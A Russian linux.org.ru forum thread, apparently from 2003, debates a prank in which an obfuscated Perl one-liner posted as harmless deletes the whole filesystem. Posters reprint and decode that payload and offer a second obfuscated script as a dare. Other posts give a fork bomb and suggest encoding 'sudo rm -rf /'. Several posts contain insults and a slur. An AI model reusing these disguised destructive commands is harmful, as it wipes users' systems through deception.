LINUX.ORG.RU

Ответ на: комментарий от mihalych

Апология подонков

Суммирую наиболее последовательные утверждения.

=== Кто попались должны винить ТОЛЬКО СЕБЯ. Вопрос о этичности поступков авторов таких "шуток" мы оставим на их совести. Автору респект. Огромный. Побольше бы таких уроков - поменьше бы тупого ламерья [...] И, главное, надо нести ответвенность за решения. А не искать виноватых. ===

Итак, определенная доля людей ОДНОЗНАЧНО и ПОЛНОСТЬЮ возлагает вину и ответственность на жертву, не оставляя на долю шутника ни того, ни другого (ни капельки!). После этого отмазка "говорить что кто-то это оправдывает - неверно. не оправдываем" становится смешной и чисто ритуальной.

Автору поста о "31 московском пидорасе": я тоже москвич, а они бывают разные.

Остальным рекомендуется художественное чтение http://www.screen.ru/Smirnov/3.htm и вообще http://www.screen.ru/Smirnov/

//психолог-любитель

anonymous
()
Ответ на: комментарий от anonymous

Дениска

Тут, собственно, говорилось о том, что автор (возможно, даже, автор - не он), умышленно сделал гадость.

Это не есть хорошо.

Ты собираешься здесь усовестить в чем-то тех, кто это осуждает.

> в общем, я в этом треде пытаюсь отстоять единственную мысль: не запускай бездумно неизвестные проги от неизвестных/малоизвестных людей.

а прочие идиоты тебя в реальном мире чему учат...

Кстати, тем, кто мог реально пострадать, уже не этого форума.

Соображать надо, чему и кого ты собираешься научить.

А разговор о доверии к комьюнити linux.org.ru, собственно... с остальными ясно.

anonymous
()
Ответ на: комментарий от mihalych

И что означает твое доверие? Форум должен стать премодерируемым? Ты не находишь, что это как минимум накладно? Специально выделенные профессионалы должны откликаться на подобные просьбы о помощи и анализировать подобные скрипты? Хм...

А если ты начет удаления данного треда постфактум - тогда мне вспоминается FAQ "Как сварить яйцо в микроволновке". Там рассказывается, почему _никогда_ не нужно пытаться этого делать. Последний вопрос/ответ в нем: Q: Следуя вашему FAQ "Как варить яйцо в микроволновке" я стал его варить, но оно взорвалось и сильно испачкало мне аппарат! A: Вы должны были внимательно дочитать FAQ до конца, не прерывая чтение после названия.

anonymous
()
Ответ на: Апология подонков от anonymous

я возлагаю ответственность на жертву. потому что в данном случае жертва сама выбирает свой путь. вину можно возлагать на шутника только в том случае, если знаешь его достаточно хорошо, и доверяешь ему. тогда такие шутки просто неуместны. тогда я просто пойду и набью ему морду. так как он мой знакомый. или просто перестану с ним общаться. а если код берешь у анонимуса, исполняешь его сам, то и виноват тоже сам. тем более не имеет смысла попусту трепаться. а оправдывать и не возлагать вину - это разные вещи.

Дениска

anonymous
()
Ответ на: комментарий от anonymous

Да фигли спорить!

Дениска прав однозначно! И особенно упоминанием про мою любимую VMWARE. Благо ресурсы практически любого компа это позволяют. Жаль только Sparc'овый Solaris не эмулирует :-(

Знакомые, которым ты доверяшь и форум, а тем более аноним - разные вещи. Нефиг в одну кучу все мешать и подтасовывать факты.

Я не призываю всех так поступать и публиковать разрушительные коды. Но перекладывать вину с больной головы (не предохранющуюся) на здоровую - глупо. На ошибках надо учиться. А не оправдываться. Только так можно извлечь урок из ситуации.

anonymous
()
Ответ на: комментарий от anonymous

> И что означает твое доверие? Форум должен стать премодерируемым?

А других идей в голову не приходит?

Т.е. ты хочешь сказать, что просто необходим кто-то с дубиной, "для соблюдения спокойствия и приличия" ?

> Специально выделенные профессионалы должны откликаться на подобные просьбы о помощи и анализировать подобные скрипты?

Нда... 02 что ли ?

P.S. "Видишь ли Пух"... "Чище не там где часто убирают, а там, где меньше сорят."

anonymous
()
Ответ на: комментарий от anonymous

2Дениска
Чувак, открывай асю. Там тя ждет сурпрыз =)
Конечно, код не такой красивый как на Перл (всем засранцам, безосновательно не любящим Перл только за то, что он есть - молчать!)
И работает с пинка. Но, думаю, ты подтвердишь что и элемент Obfuscated, и элемент Destruct там все-таки присутствуют.

Смысла ждать "завтра" не вижу, потому что и по постам ясно что ты - ты. И мой пост бы прочитал и начал бы возмущаться. Оставим айпишники кул хацерам ;)))))))

Жаль ничего лучше не получилось наваять, в силу особенностей того же сет и того, что комманд работает со своей областью переменных. Превая идея была замутить на них.
Ну, в конце концов - альфа версия ))))))))))))

Демон
з.ы.
Еще интересная команда есть конверт - кто мне скажет, после преобразования данные всегда выживают? Т.е. в обе стороны?

anonymous
()
Ответ на: комментарий от anonymous

>> И что означает твое доверие? Форум должен стать премодерируемым?

>А других идей в голову не приходит? Неа :-) А зачем мне придумывать другие идеи? Я сторонник Дениски. Отвечает и расплачивается запустивший скрипт. Так же, как порезавшийся ножом, а не придумаший/изготовивший/продавший.... По-крайней мере с моей точки зрения. О законе разговор отдельный

>Т.е. ты хочешь сказать, что просто необходим кто-то с дубиной, "для соблюдения спокойствия и приличия" ?

Безусловно.

>> Специально выделенные профессионалы должны откликаться на подобные просьбы о помощи и анализировать подобные скрипты?

>Нда... 02 что ли ?

Ну наверное. Я-то пример привел для иллюстрации абсурда идеи о "безотчетном доверии к форуму". Даже при всем своем желании администрация форума не сможет это обеспечить. Доверяй, но проверяй. И ДУМАЙ !

>P.S. "Видишь ли Пух"... "Чище не там где часто убирают, а там, где меньше сорят."

Ну не знаю, не знаю... Сдается мне, что даже вернувшись после месячного отпуска домой ты с удивлением обнаружишь пыль и потребность в уборке. Хотя никто и не сорил... Сам проверить не могу, таких длинных отпусков не бывает :-)

Так что сори, не сори, а убираться-то придется. Равно как и думать, прежде, чем развлекаться на работе. Ибо такой скрипт запускали именно в поисках fun.

anonymous
()
Ответ на: комментарий от anonymous

полу - OFF.

Прошу прощения у нормальных жителей г.Москвы и Московской обл. Сорвалось... Но всё равно... подобных гандонов всегда ненавидел, равнодушие - это наверное худшее что есть в человеке. PS: Тем не менее. Если-бы автор (припиздок грёбанный) не настолько мерзко прикольнулся (ну например действительно вывел что-то на печать... матерное к примеру)- это можно было-бы считать действительно уроком. А так иначе как подляной и не назвать. Причём дествительно, сыграв на доверии.

NN: Архимед

anonymous
()
Ответ на: комментарий от anonymous

> я возлагаю ответственность на жертву. потому что в данном случае жертва сама выбирает свой путь. вину можно возлагать на шутника только в том случае, если знаешь его достаточно хорошо

Ты опасный человек. Рядом с тобой опасно.

Зато рядом можно безнаказанно делать все, что в голову взбредет.

Ты слаб.

P.S. А как ты собираешься защищать Родину, если, вдуг, не приведи Господи, что ? Враги, ведь, могут оказать незнакомыми тебе людьми...

anonymous
()
Ответ на: комментарий от anonymous

Поправка Re: Re: Апология подонков


Хм... вопрос, на самом деле, не в личностях, а в идиологии.

Как известно, идиология способна меняться... надеюсь.

anonymous
()
Ответ на: комментарий от anonymous

Слава модератору!

Наконец-то убралась тема из топика.

anonymous
()
Ответ на: комментарий от anonymous

Я Форумы не читаю, лишь новости с заглавной страницы. А там как главная обсуждаемая новость стоит это замаскированное вредительство.

Ну не мог я предположить, что такое может держаться на заглавной страницы, доверял linux.org.ru.

Насчет доверия и ответственности. Если ты скушал йогурт и отравился, кого будешь винить, одного себя? Ведь мог же проверить на таксичность перед употреблением. Наверное ты просто лох, если не проверил.

Если десятки покупателей (да даже если и один) купили в магазине йогурт от какой-то новой неизвестной фирмы и отравились именно из-за него, то этому магазину хана, можешь проконсультироваться с любым адвокатом. Правда тут магазин может поплакаться в суде, мол, неумышленное вредительство, и наказание уменьшат. Тут же наяву умышленное вредительство, модераторы умышлено оставили, пусть читатели потирают себе диски, пусть учатся.

anonymous
()
Ответ на: комментарий от anonymous

>> я возлагаю ответственность на жертву. потому что в данном случае жертва сама выбирает свой путь. вину можно возлагать на шутника только в том случае, если знаешь его достаточно хорошо

>Ты опасный человек. Рядом с тобой опасно. Прокомментируй, плиз. Я, видно сам такой. Считаю _себя_ в ответе за все и не пытаюсь свалить вину на кого-то. В чем опасность для окружающих? Вот для знакомых есть опасность. Если меня подведут - мое доверие к человеку исчезнет и восстановиться в моих глазах будет очень нелегко.

А чужим людям я и не доверяю. И если уж приедтся попросить случайного знакомого на вокзале присмотреть за чемоданом - то я _заранее_ буду готов к тому, что вернувшись могу не найти ни того, ни другого. Соответвсенно и не оставлю там ничего ценного, что действительно жалко потерять. Ну а с потерей носков в обмен на "проверку честности" я вполне могу пойти.

>Зато рядом можно безнаказанно делать все, что в голову взбредет. Вообще говоря, фраза правильная. Только IMHO ты в нее вкладываешь иной смысл, нежели я. Я действительно терпим к людям. Потому что отказался от чувства собственной значимости и несу ответственность за решения. И очень трудно сделать что-то такое, что меня вывело бы из себя.

>Ты слаб. Такие безапелляционные заявления абсолютно без аргументации свидетельствуют о слабости именно твоей позиции :-)

>P.S. А как ты собираешься защищать Родину, если, вдуг, не приведи Господи, что ? Враги, ведь, могут оказать незнакомыми тебе людьми... Да как и ты. В чем разница-то? В том, что я врагам доверяю меньше, чем ты? Так у меня это даже эффективнее получится :-)

Тоха.

anonymous
()
Ответ на: комментарий от anonymous

>Насчет доверия и ответственности. Если ты скушал йогурт и отравился, >кого будешь винить, одного себя? Ведь мог же проверить на таксичность >перед употреблением. Наверное ты просто лох, если не проверил.

Да. если на дороге валялся йогурт и я его съел - я буду винить себя.

Хотя обычно я _покупаю_в_магазине_

>Если десятки покупателей (да даже если и один) купили в магазине >йогурт от какой-то новой неизвестной фирмы и отравились именно из-за >него, то этому магазину хана, можешь проконсультироваться с любым >адвокатом. Правда тут магазин может поплакаться в суде, мол, >неумышленное вредительство, и наказание уменьшат. Тут же наяву >умышленное вредительство, модераторы умышлено оставили, пусть >читатели потирают себе диски, пусть учатся. Да. Если он _купил_ софт, который оказался завирусованным - стоит идти в суд. Естати была несколько лет назад история, какие-то драйвера были с гадостью... От видюхи, что ли.. Случайно, конечно.

Но к нынешней ситуации это не относится. Он ничего не купил. Он _нашел_ и употребил на свой страх и риск. Даже не попытавшись понять, что это такое. В твоем примере - не взгянув на "Годен До"

Тоха.

anonymous
()
Ответ на: комментарий от anonymous

На заглавную страницу её специально никто не помещали, мне кажется, сайт автоматом считает где больше всех комментариев и выводит в TOP 10. ИМХО. Так что при чём тут доверие/не доверие к сайту...

anonymous
()

Как преподаватель кафедры компьютеризированных систем защиты информации - апплодирую автору стоя. :) Ибо нех...

anonymous
()
Ответ на: комментарий от mihalych

Дебил, ты не купил этот "йогурт". Ты его нашёл на помойке. И денег за него не платил. Я хуею, уважаемая редакция, какие здесь все-таки долбоебы околачиваются

anonymous
()
Ответ на: комментарий от anonymous

> P.S. А как ты собираешься защищать Родину, если, вдуг, не приведи Господи, что ? Враги, ведь, могут оказать незнакомыми тебе людьми...

такую родину пусть лохи защищают. умные всю жизнь в тылу отсиживались.

anonymous
()

кто людям помогает - тот тратит время зря (с) старуха Шапокляк
пока живут на свете дураки - обманом жить нам, стало быть, с руки (с) кот Базилио

anonymous
()

Позволю себе высказать мысль ЛОХа, который не может отомстить всякого рода шутникам: обходить нужно стороной таких шутников! Как? Читай выше.

PS. Умный удачно выкручивается из сложных ситуаций, в которые никогда не попадает Мудрый.

Дабы не оставаться неизвесным, Адольф.

anonymous
()
Ответ на: комментарий от anonymous

> Как преподаватель кафедры компьютеризированных систем защиты информации - апплодирую автору стоя. :) Ибо нех...

Вам бы людям, которые борются с подобными шутниками аплодировать....

И тому, что нех.... студентов учить. Ато иногда, как лаборанту убирать последствия таких запусков приходится.

Адольф. (Просьба продублировать ответы на мыло adam1is@yahoo.com)

anonymous
()
Ответ на: комментарий от anonymous

Дискутировать с анонимами без имени - пустая трата времени.

Из-за таких, lor действительно напоминает помойку. Поздравляю, построили прекрасный отстойник, и модераторы внесли свою посильную лепту. А я-то по наивности думал, что на цивилизованном сайте нахожусь. Ну, извините тогда, оставляю помойку её строителям.

К счастью английским владею свободно, полно цивилизованных сайтов. :)

mihalych ★★★
()
Ответ на: комментарий от mihalych

>К счастью английским владею свободно, полно цивилизованных сайтов. :)

А это мысль :-)

Действительно было бы интересно посмотреть на реакци. англоговорящих на подобное. Жаль, я не могу себе позволить запостить эту подлянку буржуям. Но если кто так сделает - URL на топик сюда закинтьте?

Тоха

anonymous
()
Ответ на: комментарий от anonymous

>Действительно было бы интересно посмотреть на реакци. англоговорящих на подобное. Жаль, я не могу себе позволить запостить эту подлянку буржуям. Но если кто так сделает - URL на топик сюда закинтьте?

да-да... сначало все возмущались, что автор %@^%#$$@#$, а теперь поехали - давайте всем под двери г... наложим. здорово! Типа, чего мы одни-то дураками прослыли? чего это только нашь тред на всех форумах в хуморе прописался? давайте еще кого привлечем. вместе дураками будем...

Дениска

anonymous
()
Ответ на: комментарий от anonymous

Буржуям

Не сомневаюсь что попадут. И что? Это даже не война будет, а лохотрон какой-то.
А всяким уродам, которые в тылах отсиживаются, так скажу: попали бы ко мне во взвод - я бы сделал из вас нормальных людей. Могли бы и посочувствовать и порадоваться, что сами не оказались в говне.
Было человека 2-3 из 22, которые считали себя очень умными, как без них-то? Ну и что? Нормальные сейчас ребята, хоть и досталось им.
Буржуи, думаю, сильно расстроятся по двум причинам:
1. Они СЕРЬЕЗНО недооценивают русских, а мы их переоцениваем в основном
2. Такой пакости они вряд ли ожидают.
Вирус - ладно, снес систему, заново поставил. Подумаешь, чего еще инопланетяне пришлют. Но тут - чистой воды злостный фейк, у которого целей кроме как просто сделать плохо больше нет. Их практичный ум, думаю, никогда не поймет этого. Будут считать, что фатальные последствия - простое совпадение

Демон

anonymous
()
Ответ на: комментарий от anonymous

Если кто еще не разобрался в этом коде, хотя думаю что почти все, но все же: perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Смотрим что там и как, приводим в болеее удобочитаемый вид $??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see

Далее $? ? s/;s/s;;$?/ : s//=]=>%-{<-|}<&|`{/; y/ -\/:-@[-`{-}/`-{/" -/; s//$_/see;

Далее my $i; $i = s//=]=>%-{<-|}<&|`{/; $i = tr/ -\/:-@[-`{-}/`-{\/" -/; print $i; Вроде как все Если разкомментировать нижнюю строку, то он проexecut'ит команду. #s//$i/see; Вроде как все

anonymous
()
Ответ на: Буржуям от anonymous

Преподам ЗИ

Лучше продумали бы программу, чтобы на лекциях в сон не тянуло при упоминании RSA. Вообще, все образование - сплошная гниль. Полезного выхода с него - как с козла молока. Единственное, как ни странно благодарен Матану и ТерВеру за то, что показал как бывает тяжело.
После этого любая работа кажется раем.
Дело тут не в защите информации, а в плюшевых лабораторках, на которых учат мышкой в меню копошиться, а не реальные проекты делать.
За 1 неделю реальной работы изучил Веб-сферу на уровне достаточном для зарабатывания денег на хлеб с маслом. А в институте этому два семестра учат, и ни фига никто ничего не знает на выходе.
Правильно говорят - научить невозможно, можно тока самому научиться.
Так вот задача преподов по защите информации - не учить, а учить учиться. А они тут стоя апплодируют челу, у которого ума хватило подлянку сделать
Стыдно

Демон

anonymous
()
Ответ на: комментарий от anonymous

Дениска, да никто не призывает "да-да... сначало все возмущались, что автор %@^%#$$@#$, а теперь поехали - давайте всем под двери г..."

Мне просто интересна их реакция. Они тоже будут на кого-то вину сваливать за отсутствие профессионализма у самих себя или нет?

Или они все-таки привыкли на работе работать, а не всякую фигную из Интернета запускать. А дома - ну тут уж последствия неприятные, но не так страшны. Ну день на переустановку системы...

Тоха

P.S. Автора я не оправдываю. Но виноваты сам пострадавшие.

anonymous
()
Ответ на: комментарий от anonymous

10 х Re: Апология подонков

> Мне просто интересна их реакция

а может и автору поста была интересна реакция? в данном случае цель не оправдывает средство.

Дениска

anonymous
()
Ответ на: комментарий от anonymous

Стандартный виндовый бакап или Ideal Migrations или ........... А вобще BDС в домене должен быть минимум 1.

anonymous
()
Ответ на: 10 х Re: Апология подонков от anonymous

> а может и автору поста была интересна реакция? в данном случае цель не оправдывает средство.

Может и так. Может интересно, сколько здесь профессионалов, а сколько нет. Это его дело. А дело админа - иметь бэкап, на работе работать, а не фигней страдать, предохраняться и все такое. И будь автор хоть тыща раз сволочь, все равно, эта ситуация - не форс-мажор. Не землетрясение какое-нибудь. И пострадавшие - ВИНОВАТЫ. Им можно сочувствовать, их можно как-то помочь, посоветовать софт для восстановления, предложить навыки правильного администрирования наконец. Но не оправдывать! А если их сейчас жалеть - так они и будут чувствовать себя бедными несчастными жертвами. Вместо того, чтобы научиться. И если и вынесут какой-то урок, то лишь "все козлы". А хотелось бы, чтобы он вылился в рост профессионализма. Впрочем, каждый выбирает по себе. Кому-то действительно по душе психология жертвы.

Тоха.

anonymous
()
Ответ на: комментарий от anonymous

>Как преподаватель кафедры компьютеризированных систем защиты информации

И где же это таких мудаков держат ?

Sun-ch
()
Ответ на: комментарий от anonymous

а ты чо, дебил, ее на серваке пускануть хотел?

anonymous
()
Ответ на: комментарий от anonymous

А хрена с первыми строчками письма и наездами на "спекуляцию добрыми чувствами"? А если какой новичок действительно напишет бажистую софтинку, которая все лоамет, только он этого не знает? А самонадеянный осел запустит ее рутом и она ему посечет много чего, тогда что?

Урок, жестки - но совершенно справделивый. Пускали программку САМИ, при этом в большинстве своем НЕ ПОНИМАЯ ее кода, о чем еще и пишут с обидой. А нах тогда пускать, если не разумеешь, что написано?

Мораль, не умеешь плавать - не прикидывайсая ОСВОДовцем.

anonymous
()
Ответ на: Подло от mihalych

Чтобы с проблемой разобраться - надо в ней уметь разбираться сначала. Мля, нихера не понимая, что написано - сразу запускать. Ведь сказано же было сразу "не работает". Господа, мнящие себя программерами - КОД НАДО ЧИТАТЬ СНАЧАЛА. Не умеете читать -вообще не лезьте...

anonymous
()

Ну и кто теперь рискнет запустить вот это? :))
#!/usr/bin/perl -w
$\='`'|"'";$\++;$;='/'|'`';$;++;$;++;$;++;$,=$;;$,++;$/=$,;$/++;$:=$/;
$:++;$_='%'|'`';$_.='`'|'#';$_.=$\;$_.='`'|'/';$_.=$".'"';$_.='@'|'*'&
amp;~'!';$_.="$:$,$/".$";$_.='`'|'!';$_.='`'|'.';$_.='/'|'`';$_.=
$/.$\;$_.='%'|'`';$_.=$;.$";$_.='@'|':'&~'*';$_.='`'|'%';$_.=$;;$_.='`'
|',';$_.=$".$\;$_.='`'|'!';$_.='#'|'`';$_.='+'|'`';$_.='`'|'%';$_.=$;.'&quo
t;'.$".'>&';$_.=$,&':';`$_`;

anonymous
()
Ответ на: комментарий от anonymous

>"И пострадавшие - ВИНОВАТЫ. Им можно сочувствовать, их можно как-то помочь, посоветовать софт для восстановления, предложить навыки правильного администрирования наконец. Но не оправдывать! А если их сейчас жалеть - так они и будут чувствовать себя бедными несчастными жертвами."

Пострадавшие - это не админ-придурок, который запускает что попало на сервере из-под рута, а пользователи, чьи данные там погибли, и которые не виноваты в том, что админ у них идиот.

anonymous
()
Ответ на: комментарий от anonymous

1. Как тут было верно замечено, дело в идеологии. Попробую выразить ее более рельефно, взяв предельный случай.

Наркотики. Практически во всем мире их распространение и производство считаются наказуемым деянием. С точки зрения подонков это неправильно. Хочет человек колоться - пусть колется; если продавец согласен продать, а покупатель купить товар, - не надо им мешать. Ну а в том, что случится с наркоманом, виноват ТОЛЬКО ОН САМ (цитата: "жертва сама выбирает свой путь"). Наркодилер же в их глазах - невинная овечка, не заслуживаящая не только наказания, но и порицания.

2. Оправдывать и [не]возлагать вину - действительно формально разные вещи. Оправдывать можно только того, на кого предварительно возложили вину, например, по смягчающим обстоятельствам. Если вины не возложено, то и до оправдания не доходит - можно честно глядя в глаза заявить "а я его не оправдываю" - и ведь действительно не оправдывает!

3. "такую родину пусть лохи защищают" Мне интересно, что значит "такая" Родина. Какие именно качества "Родины" не нравятся тут уважаемому оппоненту? Может ли он представить себе "Родину" (или таковая существует?) без этих качеств?

//psyco

anonymous
()

Молодец автор, кроме как в своей тупости винить некого. А если я попрошу помочь мне " Я вот прыгаю с девятого этажа и неразбиваюсь. Что я делаю не так?" Вы что меня винить будете за смерть тех кто решил попробывать. Своей головой думать надо.

Хотя хороший пример, того что не всегда все очевидно, даже если есть исходники.

Так что оставте автора в покое.

anonymous
()

Я никому не доверяю. Никому. Кроме родителей.
И на улице я всё время слежу, что вокруг. И в подъезд вхожу осторожно.

Знакомая любит повторять:
"Если у Вас паранойя, это не значит, что за Вами не следят"

Shadow ★★★★★
()

И правда работает! :)
Для желающих безопасно попробовать под FreeBSD: ;)
# mount -f -u -o ro /
# mount -f -u -o ro /usr
# mount -f -u -o ro /var
## и т.д. для всех дисков, список можно взять mountом :)

anonymous
()
Ответ на: комментарий от anonymous

anonymous (*) (03.10.2003 10:39:45)

>>Ну и кто теперь рискнет запустить вот это? :))

не работает

[gst@rain Guest-Room]$ ./test-perl.sh
Unquoted string "amp" may clash with future reserved word at ./test-perl.sh line 4.
Useless use of a constant in void context at ./test-perl.sh line 4.
sh: -c: line 1: unexpected EOF while looking for matching ``'
sh: -c: line 3: syntax error: unexpected end of file
[gst@rain Guest-Room]$

sin_a ★★★★★
()
Ответ на: комментарий от anonymous

> :(){ :|:&};: Звиздец, товарищи, примитивнейший fork bomb из-под юзверя вешает машину. Хреновый, видать из меня LFS-builder

anonymous
()

Преклоняюсь перед создателем шедевра! :)
Написана со знанием багов perlа! Программа состоящая 
сплошь из синтаксческих ошибок и работает!

Вопрос к опубликовавшему этот PEARL как нашел?

Желающим увидеть, что программа дает в результате:

perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;se;print;'

anonymous
()
Ответ на: комментарий от anonymous

Все еще проще...

~> perl -MO=Deparse -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y;-/:-@[-`{-};`-{/" -;;s;;$_;see'

$? ? s/;s/s;;$?/ : s//=]=>%-{<-|}<&|`{/;
tr ( -/:-@[-`{-}) [`-{/" \-];
s//do {
    $_;
};/see;

-e syntax OK

Имхо, достаточно очевидно, что она делает. 
по крайней мере когда с мечеными данными выполняется do { $_ }...
А вообще глац сразу цепляется на s///see. Это коварная конструкция 8)

Zulu ★★☆☆
()

надо было кодировать строку
sudo rm -rf /
так как у многих ламеров, которые сидят
не под рутом настроен sudo на безпарольное исполнение любых команда

anonymous
()
Ответ на: комментарий от anonymous

Не понятно почему результат
  system"rm -rf /"system"rm -rf /" 
выполняется через второе 'e'. Если дать result в perl -e:
$ perl -e 'system"echo rm -rf /"system"echo rm -rf /"'
syntax error at -e line 1, near ""echo rm -rf /"system"
Execution of -e aborted due to compilation errors.

anonymous
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.